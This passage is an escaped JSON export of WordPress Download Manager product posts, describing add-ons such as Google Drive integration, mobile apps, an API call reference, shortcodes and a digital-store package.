Panel:\\r\\n<img class=\\\"thumbnail alignnone wp-image-61685 size-large\\\" src=\\\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2015\\/01\\/Copy-Redirect-URL-From-Google-Drive-API-Credential-Settings-Panel-1024x663.png\\\" alt=\\\"Copy Redirect URL From Google Drive API Credential Settings Panel\\\" width=\\\"960\\\" height=\\\"622\\\" \\/><\\/li>\\r\\n \\t<li>Create API access key:\\r\\n<img class=\\\"thumbnail alignnone wp-image-61686 size-large\\\" src=\\\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2015\\/01\\/Create-API-access-key-1024x498.png\\\" alt=\\\"Create API access key\\\" width=\\\"960\\\" height=\\\"467\\\" \\/><\\/li>\\r\\n \\t<li>Now get Client ID, Client Secret &amp; API Key from credential menu:\\r\\n<img class=\\\"thumbnail alignnone wp-image-61687 size-large\\\" src=\\\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2015\\/01\\/Copy-Client-ID-Client-Secret-and-API-Key-1024x320.png\\\" alt=\\\"Copy Client ID Client Secret and API Key\\\" width=\\\"960\\\" height=\\\"300\\\" \\/><\\/li>\\r\\n \\t<li>Use that info in Downloads Manager Settings Page &gt;&gt; Cloud Storage &gt;&gt; Google Drive API Credential Settings Panel:\\r\\n<img class=\\\"thumbnail alignnone wp-image-61688 size-large\\\" src=\\\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2015\\/01\\/Setup-Google-Drive-API-Credential-Settings-Panel-1024x816.png\\\" alt=\\\"Setup Google Drive API Credential Settings Panel\\\" width=\\\"960\\\" height=\\\"765\\\" \\/><\\/li>\\r\\n \\t<li>And Save Settings!<\\/li>\\r\\n \\t<li>Now to Admin Menu &gt;&gt; Downloads &gt;&gt; Add New Package window and there you will see a new button \\\"Google Drive\\\" with \\\"Attach File\\\" metabox:\\r\\n<img class=\\\"thumbnail alignnone wp-image-25315 size-full\\\" src=\\\"https:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2015\\/01\\/google-drive-button.png\\\" alt=\\\"google-drive-button\\\" width=\\\"603\\\" height=\\\"802\\\" \\/><\\/li>\\r\\n \\t<li>Click on the button, you will see the following popup and click on \\\"Login to Google Drive\\\":\\r\\n<img class=\\\"thumbnail alignnone\\\" src=\\\"https:\\/\\/www.evernote.com\\/l\\/AV3Rn70hZhJGAoyEYFzHmcx2lK1P7szAJhsB\\/image.png\\\" alt=\\\"Google Drive Picker\\\" width=\\\"2256\\\" height=\\\"1424\\\" \\/><\\/li>\\r\\n \\t<li>After login and allow access, you will see the list of files from your Google drive.<\\/li>\\r\\n \\t<li>Finally attached files should be public to be downloadable:\\r\\n<img class=\\\"thumbnail alignnone\\\" src=\\\"https:\\/\\/www.evernote.com\\/l\\/AV2plSStoVhHzbt4XHmQBgm2QZfZhpnBD_4B\\/image.png\\\" alt=\\\"Public\\\" width=\\\"1570\\\" height=\\\"964\\\" \\/><\\/li>\\r\\n<\\/ol>\\r\\n&nbsp;\",\"post_title\":\"Google Drive Explorer\",\"post_excerpt\":\"\",\"post_status\":\"publish\",\"comment_status\":\"open\",\"ping_status\":\"closed\",\"post_password\":\"\",\"post_name\":\"google-drive-explorer\",\"to_ping\":\"\",\"pinged\":\"\",\"post_modified\":\"2017-08-13 09:22:45\",\"post_modified_gmt\":\"2017-08-13 09:22:45\",\"post_content_filtered\":\"\",\"post_parent\":0,\"guid\":\"http:\\/\\/www.wpdownloadmanager.com\\/?post_type=wpdmpro&#038;p=25300\",\"menu_order\":0,\"post_type\":\"wpdmpro\",\"post_mime_type\":\"\",\"comment_count\":\"32\",\"filter\":\"raw\"},{\"ID\":24090,\"post_author\":\"1\",\"post_date\":\"2014-12-29 20:06:40\",\"post_date_gmt\":\"2014-12-29 20:06:40\",\"post_content\":\"Using WP Download Manager App you can check download stats, sales stats and some other wpdm admin option easily from your iPhone or iPad. Please install WPDM API add-on where you have installed WP Download Manager. The API add-on will enable remote access to your WP Download Manager data from this app securely.\\r\\n\\r\\n<strong>Features:<\\/strong>\\r\\n<ul>\\r\\n \\t<li>Check Packages &amp; Categories<\\/li>\\r\\n \\t<li>Check Sales Report ( If you are using premium package add-on)<\\/li>\\r\\n \\t<li>Check Download Stats<\\/li>\\r\\n \\t<li>Receive push notification on each sale<\\/li>\\r\\n \\t<li>Receive push notification when someone downloads<\\/li>\\r\\n<\\/ul>\",\"post_title\":\"WPDM for iOS\",\"post_excerpt\":\"\",\"post_status\":\"publish\",\"comment_status\":\"open\",\"ping_status\":\"open\",\"post_password\":\"\",\"post_name\":\"wpdm-ios\",\"to_ping\":\"\",\"pinged\":\"\",\"post_modified\":\"2016-12-24 07:23:20\",\"post_modified_gmt\":\"2016-12-24 07:23:20\",\"post_content_filtered\":\"\",\"post_parent\":0,\"guid\":\"http:\\/\\/www.wpdownloadmanager.com\\/?post_type=wpdmpro&#038;p=24090\",\"menu_order\":0,\"post_type\":\"wpdmpro\",\"post_mime_type\":\"\",\"comment_count\":\"0\",\"filter\":\"raw\"},{\"ID\":22597,\"post_author\":\"1\",\"post_date\":\"2014-11-16 19:13:21\",\"post_date_gmt\":\"2014-11-16 19:13:21\",\"post_content\":\"Advanced Sales Report helps you to keep track on sales in your digital store, you can generate various report on sales, compare sales on different months, weeks or days. If you are using <a href=\\\"http:\\/\\/www.wpdownloadmanager.com\\/download\\/premium-package\\/\\\">Premium Package Add-on <\\/a> , Advanced sale report is the much have add-on for you, simply download and install, It is FREE!\\r\\n<img class=\\\"alignnone size-full wp-image-22598\\\" src=\\\"http:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2014\\/11\\/wpdmpp-sales-report.png\\\" alt=\\\"wpdmpp-sales-report\\\" width=\\\"995\\\" height=\\\"2193\\\" \\/>\",\"post_title\":\"Advanced Sales Report\",\"post_excerpt\":\"\",\"post_status\":\"publish\",\"comment_status\":\"open\",\"ping_status\":\"closed\",\"post_password\":\"\",\"post_name\":\"advanced-sales-report\",\"to_ping\":\"\",\"pinged\":\"\",\"post_modified\":\"2017-02-02 09:15:50\",\"post_modified_gmt\":\"2017-02-02 09:15:50\",\"post_content_filtered\":\"\",\"post_parent\":0,\"guid\":\"http:\\/\\/www.wpdownloadmanager.com\\/?post_type=wpdmpro&#038;p=22597\",\"menu_order\":0,\"post_type\":\"wpdmpro\",\"post_mime_type\":\"\",\"comment_count\":\"0\",\"filter\":\"raw\"},{\"ID\":21693,\"post_author\":\"1\",\"post_date\":\"2014-10-17 17:23:10\",\"post_date_gmt\":\"2014-10-17 17:23:10\",\"post_content\":\"Using WordPress Download Manager App you can check download stats, sales stats and some other wpdm admin option easily from your android device. Please install <strong><a href=\\\"http:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-api\\/\\\">WPDM API<\\/a><\\/strong> add-on where you have installed WordPress Download Manager Pro. The API add-on will enable remote access to your wpdm data from android app securely.\\r\\n<strong>Usage:<\\/strong>\\r\\n<ol>\\r\\n \\t<li>Install &amp; activate <strong><a href=\\\"http:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-api\\/\\\">WPDM API<\\/a><\\/strong> add-on<\\/li>\\r\\n \\t<li>Go to Admin Menu &gt;&gt; Downloads &gt;&gt; Settings &gt;&gt; Generate Api Key &gt;&gt; Save Settings\\r\\n<img class=\\\"alignnone size-full wp-image-52025\\\" src=\\\"http:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2014\\/10\\/wordpress-download-manager-api-settings.png\\\" alt=\\\"\\\" width=\\\"1416\\\" height=\\\"1034\\\" \\/><\\/li>\\r\\n \\t<li>Install the Android App from play store\\r\\n<img class=\\\"thumbnail\\\" src=\\\"http:\\/\\/chart.apis.google.com\\/chart?chs=200x200&amp;cht=qr&amp;chld=|1&amp;chl=http%3A%2F%2Fgoo.gl%2FQcD1gI\\\" alt=\\\"Scan\\\" \\/><\\/li>\\r\\n \\t<li>Go to App Menu &gt;&gt; Connect New Site<\\/li>\\r\\n \\t<li>Enter your site url and api key or scan the QR code from step #2<\\/li>\\r\\n \\t<li>Done &amp; Enjoy!<\\/li>\\r\\n<\\/ol>\\r\\n<strong>\\u00a0<\\/strong>\",\"post_title\":\"WPDM for Android\",\"post_excerpt\":\"\",\"post_status\":\"publish\",\"comment_status\":\"open\",\"ping_status\":\"open\",\"post_password\":\"\",\"post_name\":\"wpdm-android\",\"to_ping\":\"\",\"pinged\":\"\",\"post_modified\":\"2016-12-20 09:33:43\",\"post_modified_gmt\":\"2016-12-20 09:33:43\",\"post_content_filtered\":\"\",\"post_parent\":0,\"guid\":\"http:\\/\\/www.wpdownloadmanager.com\\/?post_type=wpdmpro&#038;p=21693\",\"menu_order\":0,\"post_type\":\"wpdmpro\",\"post_mime_type\":\"\",\"comment_count\":\"4\",\"filter\":\"raw\"},{\"ID\":21691,\"post_author\":\"1\",\"post_date\":\"2014-10-17 17:05:59\",\"post_date_gmt\":\"2014-10-17 17:05:59\",\"post_content\":\"You can use this add-on to handle remote data access request in your Download Manager Installation. <a href=\\\"http:\\/\\/www.wpdownloadmanager.com\\/download\\/premium-package-wordpress-digital-store-solution\\/\\\" target=\\\"_blank\\\">Premium Package \\u2013 WordPress Digital Store Solution<\\/a> is required with WPDM for this add-on.\\r\\n\\r\\n<strong>API URL:<\\/strong>\\r\\n<pre>http:\\/\\/wp-site-url\\/?wpdm_api=API_KEY&amp;task=API_Call_Fn&amp;parameters....<\\/pre>\\r\\n<strong>Valid API Calls:<\\/strong>\\r\\n<ul>\\r\\n \\t<li><strong>apiversion<\\/strong>\\u00a0 \\u2014 returns api version<\\/li>\\r\\n \\t<li><strong>siteInfo<\\/strong> \\u2014 returns\\u00a0 title ( sitename ), total number of packages, total sales, total downloads<\\/li>\\r\\n \\t<li><strong>getCategoryList<\\/strong> \\u2014 returns category list<\\/li>\\r\\n \\t<li><strong>getPackageList<\\/strong> \\u2014 returns package list\\r\\nParams:\\r\\n<ul>\\r\\n \\t<li><em><em>cat_id: specify the category id if\\u00a0 you want to get packages of\\u00a0 a category<\\/em><\\/em><\\/li>\\r\\n \\t<li><em>s: any strong, if you want to search package\\r\\n<\\/em><\\/li>\\r\\n<\\/ul>\\r\\n<\\/li>\\r\\n \\t<li><strong>getPackage<\\/strong> \\u2014 returns package details\\r\\nParams:\\r\\n<ul>\\r\\n \\t<li><em>pid: specify the package id ( required )\\r\\n<\\/em><\\/li>\\r\\n<\\/ul>\\r\\n<\\/li>\\r\\n \\t<li><strong>getTodaySales<\\/strong> \\u2014 returns today\'s sales when premium package add-on is active<\\/li>\\r\\n \\t<li><strong>getSales<\\/strong> \\u2014 returns sales of a package when premium package add-on is active\\r\\nParams:\\r\\n<ul>\\r\\n \\t<li><em>from_date: start date , format: yyyy-mm-dd\\u00a0 ( optional )\\r\\n<\\/em><\\/li>\\r\\n \\t<li><em>to_date: end date, format: yyyy-mm-dd ( optional )\\r\\n<\\/em><\\/li>\\r\\n \\t<li><em>pid: package id ( optional ), use if you want to get sales history of any specific package\\r\\n<\\/em><\\/li>\\r\\n<\\/ul>\\r\\n<\\/li>\\r\\n \\t<li><strong>getOrderDetails<\\/strong> \\u2014 return details of given order id when premium package add-on is active\\r\\nParams:\\r\\n<ul>\\r\\n \\t<li><em><em>oid: order id ( required )\\r\\n<\\/em><\\/em><\\/li>\\r\\n<\\/ul>\\r\\n<\\/li>\\r\\n \\t<li><strong>getOrders<\\/strong> \\u2014 returns list of orders\\r\\nParams:\\r\\n<ul>\\r\\n \\t<li><em>from_date: start date , format: yyyy-mm-dd\\u00a0 ( optional )<\\/em><\\/li>\\r\\n \\t<li><em>to_date: end date, format: yyyy-mm-dd ( optional )<\\/em><\\/li>\\r\\n \\t<li><em>count: numbers of records per page\\r\\n<\\/em><\\/li>\\r\\n \\t<li><em>cp: current page<\\/em><\\/li>\\r\\n<\\/ul>\\r\\n<\\/li>\\r\\n \\t<li><strong>downloadHistory<\\/strong> \\u2014 returns download history\\r\\nParams:\\r\\n<ul>\\r\\n \\t<li><em>uid: takes user ID ( optional ), use if you want to get the download history of any specific user\\r\\n<\\/em><\\/li>\\r\\n \\t<li><em>pid: takes package ID ( optional ), use if you want to get the download history of any specific package<\\/em><\\/li>\\r\\n \\t<li><em>day: takes date ( 1 - 31 ) ( optional )\\r\\n<\\/em><\\/li>\\r\\n \\t<li><em>month: takes month ( 1 - 12 ) ( optional )<\\/em><\\/li>\\r\\n \\t<li><em>year: takes year ( ex: 2016 ) ( optional )<\\/em><\\/li>\\r\\n \\t<li><em>cp: current page<\\/em><\\/li>\\r\\n<\\/ul>\\r\\n<\\/li>\\r\\n<\\/ul>\",\"post_title\":\"WPDM Api\",\"post_excerpt\":\"\",\"post_status\":\"publish\",\"comment_status\":\"open\",\"ping_status\":\"open\",\"post_password\":\"\",\"post_name\":\"wpdm-api\",\"to_ping\":\"\",\"pinged\":\"\",\"post_modified\":\"2016-12-21 10:16:22\",\"post_modified_gmt\":\"2016-12-21 10:16:22\",\"post_content_filtered\":\"\",\"post_parent\":0,\"guid\":\"http:\\/\\/www.wpdownloadmanager.com\\/?post_type=wpdmpro&#038;p=21691\",\"menu_order\":0,\"post_type\":\"wpdmpro\",\"post_mime_type\":\"\",\"comment_count\":\"16\",\"filter\":\"raw\"},{\"ID\":15749,\"post_author\":\"1\",\"post_date\":\"2014-04-01 00:00:00\",\"post_date_gmt\":\"2014-04-01 00:00:00\",\"post_content\":\"WPDM Button Templates will add an additional short-code code with WordPress Download Manager Pro, which will help your to create\\u00a0 css3 buttons styles link template with different style.\\r\\n<h3>Short-code:<\\/h3>\\r\\n<pre>[wpdm_button_template id=package-id style=\\\"style-name\\\" align=\\\"alignment\\\"]<\\/pre>\\r\\n<ul>\\r\\n\\t<li>style\\u00a0= light | green | blue | lightblue | xmas | instagram | coffee<\\/li>\\r\\n\\t<li>align = left | center | right<\\/li>\\r\\n<\\/ul>\\r\\n<h3>Use <a href=\\\"http:\\/\\/www.wpdownloadmanager.com\\/download\\/advanced-tinymce-button\\/\\\">TinyMce Button Add-on<\\/a> to generate short-codes for this add-on:<\\/h3>\\r\\n<img class=\\\"thumbnail\\\" src=\\\"https:\\/\\/www.evernote.com\\/l\\/AV3tHl2UlZ9FNYFUqlMODaYCgeglIPtRtxkB\\/image.png\\\" alt=\\\"Button Templates Short-code Generator\\\" width=\\\"1108\\\" height=\\\"1404\\\" \\/>\\r\\n<h3>Live Demo:<\\/h3>\\r\\n<a href=\\\"http:\\/\\/demo.wpdownloadmanager.com\\/wpdmpro\\/button-templates-add-on-free\\/\\\">http:\\/\\/demo.wpdownloadmanager.com\\/wpdmpro\\/button-templates-add-on-free\\/<\\/a>\",\"post_title\":\"WPDM Button Templates\",\"post_excerpt\":\"\",\"post_status\":\"publish\",\"comment_status\":\"open\",\"ping_status\":\"closed\",\"post_password\":\"\",\"post_name\":\"wpdm-button-templates\",\"to_ping\":\"\",\"pinged\":\"\",\"post_modified\":\"2015-10-28 09:59:44\",\"post_modified_gmt\":\"2015-10-28 09:59:44\",\"post_content_filtered\":\"\",\"post_parent\":0,\"guid\":\"http:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-button-templates\\/\",\"menu_order\":0,\"post_type\":\"wpdmpro\",\"post_mime_type\":\"\",\"comment_count\":\"13\",\"filter\":\"raw\"},{\"ID\":15739,\"post_author\":\"1\",\"post_date\":\"2014-02-04 00:00:00\",\"post_date_gmt\":\"2014-02-04 00:00:00\",\"post_content\":\"WPDM Page Templates add-on will help you to apply page type templates ( like full width page, page with left sidebar, ... depending on your theme ) for wpdm pro package details page.\\r\\n<h3>Usage:<\\/h3>\\r\\nInstall and activate the add-on just like any other regular plugin ( add-ons are actually just another plugin ). After activating page template add-on you will see template template meta box in add\\/edit package window:\\r\\n<img src=\\\"https:\\/\\/www.evernote.com\\/shard\\/s349\\/sh\\/767f71d2-a9ad-43b1-89bd-38301a83bcb9\\/0b711f9f5e9fc750962ade9dff338c10\\/deep\\/0\\/Add-New-Package---WordPress-Download-Manager-Pro-4.x---WordPress.png\\\" alt=\\\"Loading...\\\" \\/>\\r\\n\\r\\nThere is drop down you will see all custom page template available with your theme.\",\"post_title\":\"WPDM Page Templates\",\"post_excerpt\":\"\",\"post_status\":\"publish\",\"comment_status\":\"open\",\"ping_status\":\"closed\",\"post_password\":\"\",\"post_name\":\"wpdm-page-templates\",\"to_ping\":\"\",\"pinged\":\"\",\"post_modified\":\"2015-02-12 21:27:12\",\"post_modified_gmt\":\"2015-02-12 21:27:12\",\"post_content_filtered\":\"\",\"post_parent\":0,\"guid\":\"http:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-page-templates\\/\",\"menu_order\":0,\"post_type\":\"wpdmpro\",\"post_mime_type\":\"\",\"comment_count\":\"10\",\"filter\":\"raw\"},{\"ID\":15733,\"post_author\":\"1\",\"post_date\":\"2013-12-17 00:00:00\",\"post_date_gmt\":\"2013-12-17 00:00:00\",\"post_content\":\"WPDM - Image Button add-on will help you to replace the text (link label) in download link with a image button. Though, add-on packed with many excellent image buttons already, still there is a option to upload your own button images.\\r\\n\\r\\n<strong>Usages:<\\/strong>\\r\\n<ol>\\r\\n\\t<li>Install and activate image button add-on.<\\/li>\\r\\n\\t<li>Go to admin menu &gt;&gt; Downloads &gt;&gt; Settings &gt;&gt; Buttons Tab<\\/li>\\r\\n\\t<li>Select (just click) a button image<\\/li>\\r\\n\\t<li>Or upload your own image and select<\\/li>\\r\\n\\t<li>Save Changes<\\/li>\\r\\n<\\/ol>\\r\\nThat\\u2019s all. All of your download link should show with that image.\\r\\n\\r\\n<strong>Admin Option Screenshot:<\\/strong>\\r\\n<img class=\\\"alignnone size-full wp-image-35932\\\" src=\\\"http:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2013\\/12\\/wpdm-image-button1.png\\\" alt=\\\"WordPress Download Manager Image Buttons\\\" width=\\\"1009\\\" height=\\\"4093\\\" \\/>\",\"post_title\":\"WPDM Image Button\",\"post_excerpt\":\"\",\"post_status\":\"publish\",\"comment_status\":\"open\",\"ping_status\":\"closed\",\"post_password\":\"\",\"post_name\":\"wpdm-image-button\",\"to_ping\":\"\",\"pinged\":\"\",\"post_modified\":\"2016-01-07 21:32:57\",\"post_modified_gmt\":\"2016-01-07 21:32:57\",\"post_content_filtered\":\"\",\"post_parent\":0,\"guid\":\"http:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-image-button\\/\",\"menu_order\":0,\"post_type\":\"wpdmpro\",\"post_mime_type\":\"\",\"comment_count\":\"0\",\"filter\":\"raw\"},{\"ID\":15747,\"post_author\":\"1\",\"post_date\":\"2013-07-15 00:00:00\",\"post_date_gmt\":\"2013-07-15 00:00:00\",\"post_content\":\"WPDM Colorbox add-on will show the additional previews using jquery color box plugin. If you are already using <a href=\\\"https:\\/\\/www.wpdownloadmanager.com\\/downloads\\/themes\\/\\\">WPDM Themes<\\/a> , you don\'t have to use this add-on.\",\"post_title\":\"WPDM ColorBox\",\"post_excerpt\":\"\",\"post_status\":\"publish\",\"comment_status\":\"open\",\"ping_status\":\"closed\",\"post_password\":\"\",\"post_name\":\"wpdm-colorbox\",\"to_ping\":\"\",\"pinged\":\"\",\"post_modified\":\"2017-02-16 20:44:48\",\"post_modified_gmt\":\"2017-02-16 20:44:48\",\"post_content_filtered\":\"\",\"post_parent\":0,\"guid\":\"http:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-colorbox\\/\",\"menu_order\":0,\"post_type\":\"wpdmpro\",\"post_mime_type\":\"\",\"comment_count\":\"1\",\"filter\":\"raw\"},{\"ID\":15691,\"post_author\":\"1\",\"post_date\":\"2013-01-12 00:00:00\",\"post_date_gmt\":\"2013-01-12 00:00:00\",\"post_content\":\"WPDM Extended Short-codes add-on will give you better experience in using WordPress Download Manager Pro.\\u00a0 We will be adding new short-codes in every update.\\r\\n<h3>Short-code List:<\\/h3>\\r\\n<ul>\\r\\n \\t<li>[wpdm_tree] - generates a tree view of all categories and packages, if you want to use it for specific category, then: [wpdm_tree category=\\\"category-slug\\\"] , for direct download link use additional parameter download_link=1. You can also set orderby ( title, date, modified ) and order ( asc, desc) parameter for packages inside a category folder.<\\/li>\\r\\n \\t<li>[wpdm_slider id=\\\"1,2,3...\\\"] - generates image slider.<\\/li>\\r\\n \\t<li>[wpdm_carousel category=\\\"category-id\\\"] - generates carousel using the packages from select category, if you don\'t use any category id, then will show new packages.<\\/li>\\r\\n \\t<li>[popup_link] - this is not a short-code, but template tag, you can use it with link or page template if you want to open the package link in a bootstrap modal popup.<\\/li>\\r\\n<\\/ul>\\r\\n<div class=\\\"alert alert-info\\\">Please use <strong><a href=\\\"http:\\/\\/www.wpdownloadmanager.com\\/download\\/advanced-tinymce-button\\/\\\">Advanced TinyMce Button add-on<\\/a><\\/strong>\\u00a0 for generating short-codes<\\/div>\\r\\n<h3>Demo:<\\/h3>\\r\\n<a href=\\\"http:\\/\\/demo.wpdownloadmanager.com\\/wpdmpro\\/slider\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">http:\\/\\/demo.wpdownloadmanager.com\\/wpdmpro\\/slider\\/<\\/a>\\r\\n\\r\\n<a href=\\\"http:\\/\\/demo.wpdownloadmanager.com\\/wpdmpro\\/tree-view\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">http:\\/\\/demo.wpdownloadmanager.com\\/wpdmpro\\/tree-view\\/<\\/a>\\r\\n<h3>Changelog:<\\/h3>\\r\\n[panel title=\\\"Version 2.7.0 | Released on Aug 02, 2017\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"warning\\\" caption=\\\"Fix!\\\"] Fixed the issue with `array_shift` function<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel][panel title=\\\"Version 2.7.0 | Released on Nov 07, 2016\\\" class=\\\"panel-default panel-logs\\\"]\\r\\n<ul>\\r\\n \\t<li>[label class=\\\"success\\\" caption=\\\"New!\\\"] Added orderby ( title, modified, date ) and order ( asc, desc ) parameter in tree shortcode<\\/li>\\r\\n<\\/ul>\\r\\n[\\/panel]\",\"post_title\":\"WPDM Extended Short-codes\",\"post_excerpt\":\"\",\"post_status\":\"publish\",\"comment_status\":\"open\",\"ping_status\":\"closed\",\"post_password\":\"\",\"post_name\":\"wpdm-extended-short-codes\",\"to_ping\":\"\",\"pinged\":\"\",\"post_modified\":\"2017-08-05 09:07:18\",\"post_modified_gmt\":\"2017-08-05 09:07:18\",\"post_content_filtered\":\"\",\"post_parent\":0,\"guid\":\"http:\\/\\/www.wpdownloadmanager.com\\/download\\/wpdm-extended-short-codes\\/\",\"menu_order\":0,\"post_type\":\"wpdmpro\",\"post_mime_type\":\"\",\"comment_count\":\"27\",\"filter\":\"raw\"},{\"ID\":15665,\"post_author\":\"1\",\"post_date\":\"2012-01-18 00:00:00\",\"post_date_gmt\":\"2012-01-18 00:00:00\",\"post_content\":\"Advanced TinyMCE button add-on will add a button with tinymce editor from where you can place package link shortcode or category shortcode directly.\\r\\n\\r\\n<img class=\\\"alignnone\\\" src=\\\"https:\\/\\/www.evernote.com\\/l\\/AV1LN_Ekl2pI26fuUAbJz6qk6gPU-rUKP9oB\\/image.png\\\" alt=\\\"Quick Add Download\\\" width=\\\"1200\\\" height=\\\"1356\\\" \\/>\\r\\n\\r\\n<img class=\\\"alignnone\\\" src=\\\"https:\\/\\/www.evernote.com\\/l\\/AV0pMQXl271FX56meJ8asoNIFylrGHVGQ8IB\\/image.png\\\" alt=\\\"Insert Short-code\\\" width=\\\"1200\\\" height=\\\"1358\\\" \\/>\",\"post_title\":\"Advanced TinyMCE button\",\"post_excerpt\":\"\",\"post_status\":\"publish\",\"comment_status\":\"open\",\"ping_status\":\"closed\",\"post_password\":\"\",\"post_name\":\"advanced-tinymce-button\",\"to_ping\":\"\",\"pinged\":\"\",\"post_modified\":\"2017-06-14 09:13:24\",\"post_modified_gmt\":\"2017-06-14 09:13:24\",\"post_content_filtered\":\"\",\"post_parent\":0,\"guid\":\"http:\\/\\/www.wpdownloadmanager.com\\/download\\/advanced-tinymce-button\\/\",\"menu_order\":0,\"post_type\":\"wpdmpro\",\"post_mime_type\":\"\",\"comment_count\":\"8\",\"filter\":\"raw\"},{\"ID\":15671,\"post_author\":\"1\",\"post_date\":\"2011-11-18 00:00:00\",\"post_date_gmt\":\"2011-11-18 00:00:00\",\"post_content\":\"<strong>WordPress Digital Store Solution - Premium Package add-on<\\/strong> adds pricing and licensing option with WordPress Download Manager Plugin.\\u00a0<strong>WordPress Digital Store Solution - Premium Package add-on<\\/strong> helps you to setup prices for your digital products and sell it easily from your WordPress site. Moreover <strong>WordPress Digital Store Solution - Premium Package add-on<\\/strong> provides simplest \\\"Single Step\\\" checkout process, which certainly will increase the ratio of sales than any other solution with a complex checkout process. So if you are selling digital products, but still not using Premium Package - WordPress Digital Store Solution, try this, you will be amazed,<strong> 100,000+ active users can\'t be wrong<\\/strong>.\\r\\n<div class=\\\"row wpdmpp-fet\\\">\\r\\n<div class=\\\"col-md-12 text-center\\\">\\r\\n\\r\\n<hr class=\\\"divider\\\" \\/>\\r\\n\\r\\n<h2>WordPress Digital Store Solution<\\/h2>\\r\\nWordPress Download Manager &amp; Premium Package Add-on gives you the perfect WordPress Digital Store Solution to convert your site into a digital store just in few clicks:\\r\\n\\r\\n<hr class=\\\"divider\\\" \\/>\\r\\n\\r\\n<\\/div>\\r\\n<div class=\\\"col-md-12\\\">\\r\\n<div class=\\\"media\\\">\\r\\n<div class=\\\"pull-left feature-icon\\\"><img title=\\\"WordPress Download Manager Shopping Cart\\\" src=\\\"http:\\/\\/www.wpdownloadmanager.com\\/wp-content\\/uploads\\/2011\\/11\\/digital-shopping-cart.png\\\" alt=\\\"Full featured shopping cart with integrated paypal payment system to sell your packages. (premium package add-on)\\\" \\/><\\/div>\\r\\n<div class=\\\"media-body\\\">\\r\\n<h3>Shopping Cart<\\/h3>\\r\\nFull featured shopping cart with integrated PayPal payment system to sell your packages\\/products.\\r\\n\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<div class=\\\"col-md-12\\\">\\r\\n<div class=\\\"media\\\">\\r\\n<div class=\\\"pull-left feature-icon\\\"><img title=\\\"WordPress Download Manager Order Management\\\" src=\\\"http:\\/\\/cdn.wpdownloadmanager.com\\/wp-content\\/themes\\/wpdm4\\/images\\/orders.png\\\" alt=\\\"Full featured order management system to manage orders for premium packages. (premium package add-on)\\\" \\/><\\/div>\\r\\n<div class=\\\"media-body\\\">\\r\\n<h3>Order &amp; Invoice Management<\\/h3>\\r\\nExtended order and invoice management options, multiple invoice templates with customization options.\\r\\n\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<div class=\\\"col-md-12\\\">\\r\\n<div class=\\\"media\\\">\\r\\n<div class=\\\"pull-left feature-icon\\\"><img title=\\\"WordPress Download Manager Sales Report\\\" src=\\\"https:\\/\\/cdn3.iconfinder.com\\/data\\/icons\\/ballicons-free\\/128\\/graph.png\\\" alt=\\\"WordPress Download Manager Sales Report\\\" \\/><\\/div>\\r\\n<div class=\\\"media-body\\\">\\r\\n<h3>Sales Report<\\/h3>\\r\\nFull detailed report on sale and orders. Generate custom chart or graph report for site wide sales or shop specific or product specific sale easily.\\r\\n\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<div class=\\\"col-md-12\\\">\\r\\n<div class=\\\"media\\\">\\r\\n<div class=\\\"pull-left feature-icon\\\"><img title=\\\"WordPress Download Manager Mobile App\\\" src=\\\"https:\\/\\/cdn4.iconfinder.com\\/data\\/icons\\/32px_Mantra\\/PNG\\/iPhone%20On.png\\\" alt=\\\"WordPress Download Manager Mobile App\\\" \\/><\\/div>\\r\\n<div class=\\\"media-body\\\">\\r\\n<h3>Mobile Apps<\\/h3>\\r\\nYes, get everything in your pocket, check sales report from your mobile, get notifications on each sale directly on your mobile.\\r\\n\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<div class=\\\"col-md-12\\\">\\r\\n<div class=\\\"media\\\">\\r\\n<div class=\\\"pull-left feature-icon\\\"><img title=\\\"Coupon Management\\\" src=\\\"https:\\/\\/cdn1.iconfinder.com\\/data\\/icons\\/all_google_icons_symbols_by_carlosjj-du\\/64\\/coupon_tag-lb.png\\\" alt=\\\"Coupon Management\\\" \\/><\\/div>\\r\\n<div class=\\\"media-body\\\">\\r\\n<h3>Coupon Management<\\/h3>\\r\\nThe Plugin includes a very wide range of coupon management. You can create product specific coupons or global coupons for different levels of discount.\\r\\n\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<div class=\\\"col-md-12\\\">\\r\\n<div class=\\\"media\\\">\\r\\n<div class=\\\"pull-left feature-icon\\\"><img src=\\\"https:\\/\\/cdn0.iconfinder.com\\/data\\/icons\\/shop_icons\\/64\\/bag.png\\\" alt=\\\"Role Based Discount\\\" \\/><\\/div>\\r\\n<div class=\\\"media-body\\\">\\r\\n<h3>Role Based Discount<\\/h3>\\r\\nSometimes you may need to apply different discounts based on user roles, like editors and authors may have different percents of discounts.\\r\\n\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<\\/div>\\r\\n<div class=\\\"col-md-12\\\">\\r\\n<div class=\\\"media\\\">\\r\\n<div class=\\\"pull-left feature-icon\\\"><img src=\\\"https:\\/\\/cdn1.iconfinder.com\\/data\\/icons\\/Momentum_MatteEntireSet\\/32\\/tags-add.png\\\" alt=\\\"Product &amp; Price Variation\\\" \\/><\\/div>\\r\\n<div 